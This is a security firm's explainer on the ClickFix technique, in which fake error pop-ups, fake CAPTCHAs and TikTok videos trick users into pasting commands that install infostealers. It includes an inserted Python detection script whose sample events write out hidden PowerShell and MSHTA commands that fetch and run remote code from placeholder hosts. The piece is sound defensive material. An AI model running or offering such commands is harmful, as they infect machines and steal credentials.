
ClickFix technique: How to get the victim to infect their computer

The ClickFix technique causes users to infect their own devices

Malicious actors use the ClickFix technique to trick their victims into downloading and installing malware on their devices

When we say that malicious actors never stop innovating, we are not making a statement for the sake of making one. In the field of social engineering alone, new techniques or variations of existing methods are constantly emerging with the aim of deceiving citizens and companies.

Over the last year, the ClickFix technique has gained prominence. Its defining feature is that it enables criminals to persuade victims to execute malicious code on their own computers, naturally without the victims realizing what they are actually doing.

What does the ClickFix technique consist of? What are its potential consequences for citizens and companies? How can companies protect themselves against it? We answer these questions below.

1. Social engineering and malware, a critical combination for malicious activity

Like many other malicious techniques, the ClickFix technique combines two key elements, social engineering and malware, to deceive victims, infect their computers, and access the credentials, cookies, data, and documents stored on them.

First, malicious actors impersonate a company that the victim recognizes and that does not arouse suspicion: leading business-software vendors such as Microsoft or Google, or even companies linked to the sector in which the targeted organization operates.

They generally send an email to their victims redirecting them to malicious URLs with a plausible excuse, such as installing a software security update.

These pages then display a supposed problem that prevents the content from being shown correctly. To resolve it, victims are told to copy and run a script on their computers. What they are actually doing is executing PowerShell or MSHTA commands that download and run a remote script, which installs an infostealer on the victim’s device.

In this way, the criminals circumvent the security mechanisms of web browsers that block the download of malicious programs, and also catch off guard users who would otherwise be reluctant to download and run software on their computers, especially company-owned ones.

It should also be noted that tools such as PowerShell do not typically trigger alerts when it is the user themselves who runs the command, which makes automatic detection difficult.
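The execution chain described above does leave a recognizable trace in process-creation telemetry: an interpreter (PowerShell, MSHTA) started by explorer.exe, the parent of a command pasted into the Run dialog, with a URL and a download-and-evaluate or hidden-window cue on its command line. The following added example (not code from the original post) scores constructed Sysmon/4688-style events against that pattern; the sample events, paths and .invalid hostnames are all made up for illustration.

```python
"""Flag ClickFix-style launches in constructed process-creation events.
Added example, not from the original post. Event dicts mimic Sysmon Event ID 1 /
Security 4688 fields: Image, ParentImage, CommandLine."""
import re

# Interpreters the post names (PowerShell, MSHTA); pwsh/cmd are an assumption.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
USER_PARENTS = {"explorer.exe"}  # parent of a command pasted into the Win+R dialog
URL_RE = re.compile(r"https?://\S+", re.I)
# Cues that the command fetches remote content, evaluates it, or hides its window.
CUE_RE = re.compile(r"invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|\biex\b"
                    r"|invoke-expression|-w(indowstyle)?\s+hidden|mshta\s+https?:", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def assess(event: dict) -> tuple[bool, list[str]]:
    """Return (suspicious, reasons) for one process-creation event."""
    image, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in INTERPRETERS:
        return False, []
    reasons = []
    if parent in USER_PARENTS:
        reasons.append(f"{image} launched from {parent} (Run dialog / user paste)")
    if URL_RE.search(cmd):
        reasons.append("command line contains a URL")
    if CUE_RE.search(cmd):
        reasons.append("download/execute or hidden-window cue")
    # A URL or cue alone is common in admin scripts: require the human-launch
    # signal plus at least one more clue before calling it ClickFix-like.
    return parent in USER_PARENTS and len(reasons) >= 2, reasons

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return [(ProcessId, reasons)] for events that look like ClickFix executions."""
    return [(e["ProcessId"], r) for e in events for s, r in [assess(e)] if s]

# Constructed sample events: placeholder paths and .invalid hostnames, no real IoCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm http://example.invalid/fix.txt | iex"'},
    {"ProcessId": 4133, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ProcessId": 5010, "Image": PS, "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},  # benign automation
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The third event, a scheduled script launched by a management agent, is deliberately left unflagged: the point is the explorer.exe parent combined with remote-fetch cues, not PowerShell use as such.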

Thanks to this malware, which often goes unnoticed by the victim, malicious actors can steal critical information stored on the device, including corporate software access credentials, cookies, various documents, financial data, and cryptocurrency wallets.

2. How do they get victims to copy and execute commands on their computers?

What is the key element of the ClickFix technique? Getting the victim to decide to copy and execute the malicious code on their computer. Hence, much of the success of this technique lies in the ability of hostile actors to deceive users. What tricks do they use?

2.1. Solving a problem by executing commands on the device

Most commonly, hostile actors using the ClickFix technique attempt to deceive their victims by presenting them with a false problem that can be resolved by executing malicious commands.

For example, consider a professional who has clicked on a supposed Google Meet link. They land on a fake page that is so well designed that it looks real. However, a pop-up alert appears, warning them that the page cannot be displayed correctly until the problem is resolved.

This alert typically includes a button labeled “Fix It,” which is why the technique is known as ClickFix. When the button is clicked, the malicious command is copied to the clipboard, and another pop-up window opens instructing the user to open the Windows console, paste the command, and execute it.

Is the ClickFix technique only being used against computers running Windows? No. Attacks against computers running Linux and macOS, as well as iOS and Android devices, have also been detected.

Furthermore, malicious pages are not the only means used to implement the ClickFix technique. For example, the malicious group TA571 has used a supposed Word document that, according to the lure, cannot be displayed until a Word Online extension is installed in the browser.

This case illustrates the ingenuity of malicious actors and their ongoing pursuit of new techniques, tactics, and procedures.

Social engineering is becoming more sophisticated

2.2. A fake user verification process

How many times have you tried to enter a website and encountered a CAPTCHA process to verify that you are a person and not a bot? Well, malicious actors are also using fake CAPTCHA pages to deceive their victims.

When the user clicks the button to verify that they are a person, the commands are copied, and a pop-up similar to the one in the previous case opens, laying out the steps the user must follow, disguised as a supposed identity-verification procedure.

2.3. The ClickFix technique has reached TikTok

These classic strategies are now being joined by a deception tactic that uses none other than TikTok, the social network of the moment.

Through videos posted on the TikTok platform and created using generative AI, methods are promoted to install paid versions of software such as Microsoft Office or CapCut, as well as the premium version of Spotify, for free on computers. The reach of these campaigns is concerning because these videos often employ an “easy trick” hook that attracts a large audience.

What do these supposed tricks consist of? Once again, copying and executing malicious commands. As a result, victims do not get the promised software but instead suffer the installation of an infostealer that steals their passwords, cookies, and other valuable information.

Unlike previous variants of the ClickFix technique, which use phishing and target professionals at specific companies, this variant seeks to cast a wide net and infect as many devices as possible.

3. What are hostile actors looking for when using the ClickFix technique?

The mantra “information is power” has been valid since the dawn of civilization, but in the world of cybersecurity, it is even more true.

That is why numerous groups specializing in malware development have opted to use the ClickFix technique to break into corporate computers, getting the victims themselves to infect them with infostealers that scan web browsers, authentication management applications, and cryptocurrency wallets. What are they looking for? Credentials, passwords, session cookies, multi-factor authentication tokens, and other sensitive data.

What is the purpose of obtaining this wealth of information?

  • Extort companies by threatening to disclose confidential data and documents about them or their customers.
  • Commit financial fraud against companies, their customers, or their professionals.
  • Impersonate the company and its professionals in fraud against third parties.
  • Sell data on the dark web that allows other cybercriminals to carry out attacks against companies, their employees, their customers, or their suppliers.
  • Spy on specific companies and trade the information obtained.

In other words, the primary objective, as is often the case in the field of cyberattacks and fraud, is to generate revenue from malicious actions.

Which infostealers can the malicious actors behind the ClickFix technique use? The list of detected malware is long: AsyncRAT, Atomic Stealer, Danabot, DarkGate, Lumma Stealer, NetSupport, Odyssey Stealer, Stealc, Vidar… This clearly demonstrates the commitment of multiple criminal groups to the ClickFix technique.

The ClickFix technique combines social engineering and malware

4. How can companies combat the ClickFix technique?

The ClickFix technique can put ordinary people at risk, but above all, it poses a major threat to businesses. Why? If cybercriminals manage to infect a corporate computer, they can gain access to critical information and programs, causing significant financial losses for organizations.

To deal with increasingly sophisticated and difficult-to-detect techniques and tactics, it is essential that companies:

  • Restrict the use of tools that allow commands to be executed or limit privileges on computers.
  • Commit to ongoing training and raising awareness among their professionals.

4.1. Social engineering tests are key

In this regard, they can periodically undergo social engineering tests. Through these tests, cybersecurity experts carry out customized attack simulations to:

  1. Assess an organization’s level of maturity in the face of sophisticated social engineering techniques such as ClickFix.
  2. Define the level of risk the company faces from social engineering attacks, and propose measures to reduce that risk and increase its ability to resist malicious techniques and tactics.
  3. Raise awareness among professionals and managers about the consequences of a social engineering attack against their organization.
  4. Provide practical training to company staff so they can implement a series of best practices in their day-to-day work, which will help them avoid falling victim to social engineering attacks, such as the ClickFix technique, CEO fraud, malvertising, or SEO poisoning.

In addition, companies must carry out continuous security audits to detect the presence of malicious programs on corporate computers and be prepared to activate the incident response in the shortest possible time to contain the impact and expel hostile actors.

In short, the rise of the ClickFix technique demonstrates once again that malicious actors are highly motivated and relentless in their efforts to design attacks that enable them to overcome the mistrust of citizens and professionals, ultimately infecting their devices.

Given that attempts at fraud against companies and individuals continue to grow, companies must increase their resilience to social engineering and implement cybersecurity services that enable them to do so.